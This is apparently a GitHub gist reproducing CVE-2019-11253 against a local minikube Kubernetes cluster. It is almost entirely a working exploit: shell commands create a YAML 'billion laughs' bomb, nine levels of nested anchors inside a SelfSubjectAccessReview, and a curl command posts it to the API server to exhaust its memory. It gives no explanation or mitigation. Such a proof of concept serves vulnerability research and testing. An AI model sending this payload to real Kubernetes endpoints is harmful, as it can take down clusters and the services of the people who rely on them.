Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
CVE-2019-11253
$ minikube version
minikube version: v1.4.0
commit: 7969c25a98a018b94ea87d949350f3271e9d64b6
$ minikube start --kubernetes-version=v1.13.11
$ kubectl version
Client Version: version.Info{Major:"1", Minor:"16", GitVersion:"v1.16.0", GitCommit:"2bd9643cee5b3b3a5ecbd3af49d09018f0773c77", GitTreeState:"clean", BuildDate:"2019-09-19T14:00:14Z", GoVersion:"go1.12.9", Compiler:"gc", Platform:"darwin/amd64"}
Server Version: version.Info{Major:"1", Minor:"13", GitVersion:"v1.13.11", GitCommit:"25074a190ef2a07d8b0ed38734f2cb373edfb868", GitTreeState:"clean", BuildDate:"2019-09-18T14:34:46Z", GoVersion:"go1.11.13", Compiler:"gc", Platform:"linux/amd64"}
$ cat <<EOL > yaml-bomb.yaml
apiVersion: authorization.k8s.io/v1
kind: SelfSubjectAccessReview
metadata:
labels:
a: &a ["web","web","web","web","web","web","web","web","web"]
b: &b [*a,*a,*a,*a,*a,*a,*a,*a,*a]
c: &c [*b,*b,*b,*b,*b,*b,*b,*b,*b]
d: &d [*c,*c,*c,*c,*c,*c,*c,*c,*c]
e: &e [*d,*d,*d,*d,*d,*d,*d,*d,*d]
f: &f [*e,*e,*e,*e,*e,*e,*e,*e,*e]
g: &g [*f,*f,*f,*f,*f,*f,*f,*f,*f]
h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g]
i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h]
spec:
resourceAttributes:
group: apps
resource: deployments
verb: create
namespace: dev
EOL
$ curl --insecure https://$(minikube ip):8443/apis/authorization.k8s.io/v1/selfsubjectaccessreviews -H "Content-Type: application/yaml" --data-binary @yaml-bomb.yaml
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment